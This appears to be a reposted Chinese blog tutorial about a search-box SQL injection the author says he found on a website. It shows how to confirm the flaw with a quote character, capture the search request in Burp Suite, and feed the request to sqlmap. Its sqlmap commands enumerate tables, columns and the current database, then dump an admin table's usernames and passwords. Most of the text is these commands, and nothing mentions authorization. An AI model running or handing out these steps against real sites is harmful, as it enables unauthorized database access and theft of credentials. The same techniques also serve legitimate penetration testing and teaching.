burpsuit辅助sqlmap攻击
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了burpsuit辅助sqlmap攻击相关的知识,希望对你有一定的参考价值。
今天发现一个搜索型注入,主要是利用网站的搜索引擎来注入的
例如下图所示:
在这个搜索 地方,我们可以输入2个字符验证他们是否能注入;
输入:‘ 出错
输入:% 不出错
满足以上2点,即可注入,我们要用到的工具为burpsuit,sqlmap
1:首先我们在搜索框里随便输入一个数字,我这里输入123,利用burpsuit把他抓包抓下来
2:然后把抓包抓下来的复制,然后粘贴到文本文档上去,保存到1.txt文件里
命令为:python sqlmap/sqlmap.py -r 1.txt
3:python sqlmap/sqlmap.py -r 1.txt --tables 猜表名
4:python sqlmap/sqlmap.py -r 1.txt --current-db 查看当前的数据库
5:python sqlmap/sqlmap.py -r 1.txt -T admin --columns 猜列名
6:python sqlmap/sqlmap.py -r 1.txt -D 指定数据库 -T admin -C admin,password --dump
综上,即可。
本文出自 “costin” 博客,请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918433
以上是关于burpsuit辅助sqlmap攻击的主要内容,如果未能解决你的问题,请参考以下文章
BurpSuite日志分析导入SqlMap进行批量扫描-BurpLogFilter